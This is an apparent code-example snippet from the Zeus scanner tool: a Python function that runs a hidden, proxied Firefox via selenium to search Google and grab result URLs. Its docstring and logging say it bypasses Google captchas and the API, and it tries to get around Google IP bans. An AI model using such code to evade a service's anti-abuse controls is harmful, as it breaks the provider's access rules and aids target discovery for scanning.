                len(retval), link_amount
            )
        ))
        write_to_log_file(list(retval), URL_LOG_PATH, "url-log-{}.log")
    else:
        logger.error(set_color(
            "unable to extract URL's from results...", level=40
        ))
Example #30
def get_urls(query, url, verbose=False, warning=True, **kwargs):
    """
      Bypass Google captchas and Google API by using selenium-webdriver to gather
      the Google URL. This will open a robot controlled browser window and attempt
      to get a URL from Google that will be used for scraping afterwards.
    """
    proxy, user_agent = kwargs.get("proxy", None), kwargs.get("user_agent", None)
    if verbose:
        logger.debug(set_color(
            "setting up the virtual display to hide the browser...", level=10
        ))
    ff_display = Display(visible=0, size=(800, 600))
    ff_display.start()
    logger.info(set_color(
        "firefox browser display will be hidden while it performs the query..."
    ))
    if warning:
        logger.warning(set_color(
            "your web browser will be automated in order for Zeus to successfully "
            "bypass captchas and API calls. this is done in order to grab the URL "
            "from the search and parse the results. please give selenium time to "
            "finish it's task...", level=30
        ))
    if verbose:
        logger.debug(set_color(
            "running selenium-webdriver and launching browser...", level=10
        ))

    if verbose:
        logger.debug(set_color(
            "adjusting selenium-webdriver user-agent to '{}'...".format(user_agent), level=10
        ))
    if proxy is not None:
        proxy_type = proxy.keys()
        proxy_to_use = Proxy({
            "proxyType": ProxyType.MANUAL,
            "httpProxy": proxy[proxy_type[0]],
            "ftpProxy": proxy[proxy_type[0]],
            "sslProxy": proxy[proxy_type[0]],
            "noProxy": ""
        })
        if verbose:
            logger.debug(set_color(
                "setting selenium proxy to '{}'...".format(
                    ''.join(proxy_type) + "://" + ''.join(proxy.values())
                ), level=10
            ))
    else:
        proxy_to_use = None

    profile = webdriver.FirefoxProfile()
    profile.set_preference("general.useragent.override", user_agent)
    browser = webdriver.Firefox(profile, proxy=proxy_to_use)
    logger.info(set_color("browser will open shortly..."))
    browser.get(url)
    if verbose:
        logger.debug(set_color(
            "searching search engine for the 'q' element (search button)...", level=10
        ))
    search = browser.find_element_by_name('q')
    logger.info(set_color(
        "searching '{}' using query '{}'...".format(url, query)
    ))
    try:
        search.send_keys(query)
        search.send_keys(Keys.RETURN)  # hit return after you enter search text
        time.sleep(3)
    except ElementNotInteractableException:
        browser.execute_script("document.querySelectorAll('label.boxed')[1].click()")
        search.send_keys(query)
        search.send_keys(Keys.RETURN)  # hit return after you enter search text
        time.sleep(3)
    if verbose:
        logger.debug(set_color(
            "obtaining URL from selenium..."
        ))
    try:
        retval = browser.current_url
    except UnexpectedAlertPresentException:
        logger.warning(set_color(
            "alert present, closing...", level=30
        ))
        alert = browser.switch_to.alert
        alert.accept()
        retval = browser.current_url
    ban_url_schema = ["http://ipv6.google.com", "http://ipv4.google.com"]
    if any(u in retval for u in ban_url_schema):  # if you got IP banned
        logger.warning(set_color(
            "it appears that Google is attempting to block your IP address, attempting bypass...", level=30
        ))
        try:
            retval = bypass_ip_block(retval)
            do_continue = prompt(
                "zeus was able to successfully extract the URL from Google's ban URL "
                "it is advised to shutdown zeus and attempt to extract the URL's manually. "
                "failing to do so will most likely result in no results being found by zeus. "
                "would you like to shutdown", opts="yN"
            )
            if not str(do_continue).lower().startswith("n"):  # shutdown and write the URL to a file
                write_to_log_file(retval, EXTRACTED_URL_LOG, "extracted-url-{}.log")
                logger.info(set_color(
                    "it is advised to use the built in blackwidow crawler with the extracted URL "
                    "(IE -b '{}')".format(retval)
                ))
                shutdown()
        except Exception as e:
            browser.close()  # stop all the random rogue processes
            ff_display.stop()
            logger.exception(set_color(
                "zeus was unable to extract the correct URL from the ban URL '{}', "
                "got exception '{}'...".format(
                    unquote(retval), e
                ), level=50
            ))
            request_issue_creation()
            shutdown()
    if verbose:
        logger.debug(set_color(
            "found current URL from selenium browser...", level=10
        ))
    logger.info(set_color(
        "closing the browser and continuing process.."
    ))
    browser.close()
    ff_display.stop()
    return retval